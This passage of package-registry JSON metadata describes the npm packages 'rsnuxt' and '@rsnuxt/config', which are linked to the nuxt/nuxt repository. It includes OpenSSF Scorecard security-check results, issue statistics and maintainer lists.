'3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:01.220Z","dependent_packages_count":0,"downloads":705,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/rsnuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/rsnuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/rsnuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/rsnuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rsnuxt/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:16.099Z","updated_at":"2025-02-11T09:42:16.099Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11342486,"name":"@rsnuxt/config","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":17,"first_release_published_at":"2025-02-11T09:14:54.637Z","latest_release_published_at":"2025-09-08T05:31:55.820Z","latest_release_number":"0.5.8","last_synced_at":"2026-05-11T01:23:06.260Z","created_at":"2025-02-11T09:15:17.249Z","updated_at":"2026-05-11T01:23:06.261Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/config","install_command":"npm install @rsnuxt/config","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","latest":"0.5.8"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:03.052Z","dependent_packages_count":0,"downloads":804,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/config","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/config","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/config","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/config/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"l